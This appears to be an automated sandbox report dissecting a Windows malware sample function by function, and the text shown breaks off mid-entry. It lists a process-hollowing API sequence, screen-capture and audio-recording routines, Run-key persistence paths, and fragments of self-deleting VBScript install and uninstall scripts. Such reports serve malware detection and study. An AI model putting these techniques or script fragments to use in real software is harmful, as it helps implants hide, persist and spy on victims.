            Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
            Download Yara Rule
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
            • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
            • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
            • Instruction Fuzzy Hash:
            Function 0041642D Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
            • GetProcAddress.KERNEL32(00000000), ref: 00416477
            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
            • GetProcAddress.KERNEL32(00000000), ref: 0041648B
            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
            • GetProcAddress.KERNEL32(00000000), ref: 0041649F
            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
            • GetProcAddress.KERNEL32(00000000), ref: 004164B3
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
            • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
            • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
            • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
            • ResumeThread.KERNEL32(?), ref: 00416773
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
            • GetCurrentProcess.KERNEL32(?), ref: 00416795
            • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
            • GetLastError.KERNEL32 ref: 004167B8
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
            • API String ID: 4188446516-108836778
            • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
            • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
            • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
            • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
            Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
            Download Yara Rule
            APIs
            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
            • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
              • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
            • DeleteDC.GDI32(00000000), ref: 00416F32
            • DeleteDC.GDI32(00000000), ref: 00416F35
            • DeleteObject.GDI32(00000000), ref: 00416F38
            • SelectObject.GDI32(00000000,00000000), ref: 00416F59
            • DeleteDC.GDI32(00000000), ref: 00416F6A
            • DeleteDC.GDI32(00000000), ref: 00416F6D
            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
            • GetIconInfo.USER32(?,?), ref: 00416FC5
            • DeleteObject.GDI32(?), ref: 00416FF4
            • DeleteObject.GDI32(?), ref: 00417001
            • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
            • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
            • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
            • DeleteDC.GDI32(?), ref: 0041713C
            • DeleteDC.GDI32(00000000), ref: 0041713F
            • DeleteObject.GDI32(00000000), ref: 00417142
            • GlobalFree.KERNEL32(?), ref: 0041714D
            • DeleteObject.GDI32(00000000), ref: 00417201
            • GlobalFree.KERNEL32(?), ref: 00417208
            • DeleteDC.GDI32(?), ref: 00417218
            • DeleteDC.GDI32(00000000), ref: 00417223
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
            • String ID: DISPLAY
            • API String ID: 479521175-865373369
            • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
            • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
            • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
            • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
            Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
            • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
              • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
              • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
            • ExitProcess.KERNEL32 ref: 0040C389
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
            • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
            • API String ID: 1861856835-1953526029
            • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
            • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
            • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
            • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
            Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
            Download Yara Rule
            APIs
            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
            • ExitProcess.KERNEL32(00000000), ref: 00410F05
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
            • CloseHandle.KERNEL32(00000000), ref: 00410FA0
            • GetCurrentProcessId.KERNEL32 ref: 00410FA6
            • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
            • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
            • lstrcatW.KERNEL32(?,.exe), ref: 00411066
              • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
            • Sleep.KERNEL32(000001F4), ref: 004110E7
            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
            • CloseHandle.KERNEL32(00000000), ref: 0041110E
            • GetCurrentProcessId.KERNEL32 ref: 00411114
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
            • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
            • API String ID: 2649220323-71629269
            • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
            • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
            • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
            • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
            Function 0040BC59 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 259registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
              • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
            • ExitProcess.KERNEL32 ref: 0040BFD7
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
            • String ID: ")$.vbs$05#v`#v$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
            • API String ID: 3797177996-1044233930
            • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
            • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
            • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
            • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
            Function 0040B871 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296fileCOMMON
            Download Yara Rule
            APIs
            • _wcslen.LIBCMT ref: 0040B882
            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
            • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
            • _wcslen.LIBCMT ref: 0040B968
            • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
            • _wcslen.LIBCMT ref: 0040BA25
            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
            • ExitProcess.KERNEL32 ref: 0040BC36
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
            • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
            • API String ID: 2743683619-2376316431
            • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
            • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
            • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
            • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
            Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
            Download Yara Rule
            APIs
            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
            • SetEvent.KERNEL32 ref: 004191CF
            • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
            • CloseHandle.KERNEL32 ref: 004191F0
            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
            • API String ID: 738084811-1354618412
            • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
            • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
            • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
            • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
            Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
            • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
            • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
            • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Write$Create
            • String ID: RIFF$WAVE$data$fmt
            • API String ID: 1602526932-4212202414
            • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
            • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
            • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
            • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
            Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
            Download Yara Rule
            APIs
            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
            • LoadLibraryA.KERNEL32(?), ref: 0041386D
            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
            • FreeLibrary.KERNEL32(00000000), ref: 00413894
            • LoadLibraryA.KERNEL32(?), ref: 004138CC
            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
            • FreeLibrary.KERNEL32(00000000), ref: 004138E5
            • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
            • FreeLibrary.KERNEL32(00000000), ref: 0041390B
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Library$AddressFreeProc$Load$DirectorySystem
            • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
            • API String ID: 2490988753-3443138237
            • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
            • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
            • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
            • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
            Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$EnvironmentVariable$_wcschr
            • String ID:
            • API String ID: 3899193279-0
            • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
            • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
            • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
            • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
            Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • ___free_lconv_mon.LIBCMT ref: 0044E4EA
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
            • _free.LIBCMT ref: 0044E4DF
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 0044E501
            • _free.LIBCMT ref: 0044E516
            • _free.LIBCMT ref: 0044E521
            • _free.LIBCMT ref: 0044E543
            • _free.LIBCMT ref: 0044E556
            • _free.LIBCMT ref: 0044E564
            • _free.LIBCMT ref: 0044E56F
            • _free.LIBCMT ref: 0044E5A7
            • _free.LIBCMT ref: 0044E5AE
            • _free.LIBCMT ref: 0044E5CB
            • _free.LIBCMT ref: 0044E5E3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
            • String ID: pF
            • API String ID: 161543041-2973420481
            • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
            • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
            • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
            • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
            Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
              • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
              • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
            • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
            • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
            • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
            • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
            • Sleep.KERNEL32(00000064), ref: 00411C63
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
            • String ID: /stext "$$.F$@#G$@#G
            • API String ID: 1223786279-2596709126
            • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
            • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
            • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
            • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
            Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free
            • String ID: pF
            • API String ID: 269201875-2973420481
            • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
            • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
            • Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
            • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
            Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040DE79
